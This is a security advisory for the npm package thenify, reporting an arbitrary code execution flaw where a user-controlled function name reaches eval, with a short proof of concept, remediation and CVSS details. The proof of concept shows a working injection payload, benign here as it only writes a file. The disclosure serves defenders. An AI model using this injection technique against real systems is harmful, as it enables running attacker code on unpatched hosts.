SNYK-JS-THENIFY-571690

SNYK-JS-THENIFY-571690 PUBLISHED CVSS 8.600000381469727 HIGH

## Overview [thenify](https://www.npmjs.com/package/thenify) is a Promisify a callback-based function using any-promise. Affected versions of this package are vulnerable to Arbitrary Code Execution. The `name` argument provided to the package can be controlled by users without any sanitization, and this is provided to the `eval` function without any sanitization. ### PoC ``` var a = require("thenify"); var attack_code = "fs=require('fs');fs.writeFile('Song', 'test',function(){})"; function cur(){}; Object.defineProperty(cur, "name", { value: "fake() {" + attack_code + ";})();(function(){//"}); a(cur); ``` ## Remediation Upgrade `thenify` to version 3.3.1 or higher. ## References - [GitHub Commit](https://github.com/thenables/thenify/commit/0d94a24eb933bc835d568f3009f4d269c4c4c17a) - [Vulnerable Code](https://github.com/thenables/thenify/blob/master/index.js#L17)

Risk Scores

CVSS v3.1

8.600000381469727

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:P/RL:U/RC:C

Affected Products

Vendor	Product	Versions
		0

Timeline

Jun 15, 2020 CVE Published
Jun 15, 2020 CVE Updated

References

Open in Interactive Console →